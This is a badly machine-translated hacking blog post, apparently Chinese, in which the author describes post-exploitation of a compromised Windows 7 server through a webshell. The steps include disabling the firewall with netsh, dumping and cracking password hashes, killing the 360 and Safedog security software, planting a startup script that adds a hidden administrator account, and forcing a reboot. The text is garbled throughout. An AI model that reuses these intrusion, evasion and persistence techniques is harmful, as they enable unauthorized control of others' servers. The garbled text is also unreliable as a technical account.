Thoughts: dongle + 360 tips for adding a full set of accounts
Cause: a group of people on a certain day
Then he took the wonderful job and never heard of him. There is a saying: "If you are not blind, don't use your ears to understand it !" , Or you have to think about the insurance.
If you are lucky, it is the system permission.
I thought it should be very simple, ......
Systeminfo: The system information obtained from the system query: win7 flagship version of Visual Testing X86 system.
Yes, it is win7, but 3389 cannot be connected. Run the tasklist/svc command randomly to obtain: 360 full set + server security dog
The netstat-ano command indicates that port 3389 is enabled.
Come up with the above idea: 1.tcp/ ip filtering 2. Firewall 3. dongle interception 4. In general, you may get an ip address through the kitchen knife in the Intranet environment.
This Ip address is not accurate. If you don't believe it, you can try a cdn website. We recommend that you do not use the domain name to connect to the server. Because ..... Obtain the real ip address of the server through ipconfig: XX. XX (determined to be an Internet ip address)
The target ip address port of the local telnet instance is not connected.
Run the query user command: the administrator is found to be online and the account is administrator.
Based on the analysis of the above problem, I often use the win7 system. When win7 + 360 is full, every anti-virus attack will prompt the computer to enable the firewall. Since the Administrator uses Windows 7 as the server, the chance of enabling dongle desktop guard is very small. To prove that I have executed the following command to disable the Firewall:
Default
1
Netsh firewall set opmode disable
It is indeed a firewall problem and can be connected.
In this case, complete the task. Give it to cool.
In this case, note that the local port should be xp, but the mstsc won't work. Replace mstsc above win7. On the contrary, some servers or computers need mstsc below win7 to connect. (For solutions without 3389 connections, see breaking various access restrictions on 3389 connections.)
-------------------------------------------- I thought this was the case. After a day's meeting, I saw Cool cool in the group after dinner at night.
Cool Shuai Niu hasn't entered the server yet, okay. Do not study directory permissions. Do not go to the server directly. Afterwards, I exchanged work with cow and I continued to raise his privilege. Since it is a system permission and does not require any overflow permissions, just add an account. Execute net user xxxxx ............ No echo, OK is safe dog in disorder (long ago think of) Self upload cmd + net1-net111
The execution results disappoint me.
You can run the exe program in different ways without using quotation marks. Multiple kill-free
No, it must be a dog again. In webshell, all programs are executed with the suffix of exe. I won't talk about it in the kitchen knife. Go to the root password in the directory
Because the website directory is very restrictive, you cannot upload or modify any files. When the server has 360 and the dongle, they temporarily give up. Since the net does not work, hash is directly cracked. Getpass is unavailable in some cases. In order to avoid this, I will start hash directly.
It is incomplete and cannot be decrypted. Second, use getpass to crack the password. The password is null. After trying, the password is empty, but it is blocked by the Group Policy. The empty password only allows local logon and remote logon.
On-Site Remote Control is inevitable. Directly killed. During this period, many apis were added to the Account, including aio cloning. F4ck, Seay, dadan, wlozz, and add cannot all be added, and many others are directly killed. Use the vbs script and the bat script to add an account. No. Try to end the dongle process, find out the dongle process, bat batch ends and add other commands to the backdoor.
Generally, the service is stopped first. The following are commands that allow exe and so on. Run the command in the kitchen knife.
Only the dongle is temporarily terminated and other commands are not executed successfully. Forced to do so, only increased startup. Because each time the computer is turned on, it is loaded and the boot script is faster than the dongle. Adding an account before the dongle is theoretically acceptable. Modify the script and load the startup Item. Also did not look at added to the startup Item. Directly shut down-r-t 5 to restart the server, and then go to the restroom.
Although it may not be added to the system startup Item, I was pleasantly surprised after the restart. You are not mistaken. 360sd is gone. (In fact, it is not started at startup ). The query user does not find that the user is online. If the user logs in, the anti-virus service will immediately get up (if you do not believe it, try it ). This time, no anti-virus service is available. Continue to add the account tool on the api. That's right. If it doesn't work, you may be surprised to restart the server. (I once claimed the right to one server. After I restarted the server, the dongle turned on and intercepted the shell.)-ConfigService can be used to modify the startup mode, disable startup of dongle 360 on the restart server. -Clone failed. Check whether the password hash is the same. Once again, I made a round of api Plus account. No. Finally, the multi-functional artifacts are turned out, and the front is directly hacked.
The account is successfully added to the Registry.
. Net user cannot be queried. I do not know if it is successfully added. Here, use getpass or pw7 to check.
You can understand the results. Look, this api is fine. Add.
The Elevation of Privilege is over, win7 system. Did you see that 360 anti-virus was started? Attached a server security configuration diagram:
Summary: Many people think that they are system-authorized and can do everything. Dogs and 360 give these people a great chance.
The progress of attack and defense is always between confrontation. The author thinks a lot and has been tossing for a long time. In the end, the protection of the two security software is bypassed and users are added. Patience and ideas are commendable. This article aims to share ideas and provide you with a way to bypass security software. I hope you will gain some gains after reading this article. :)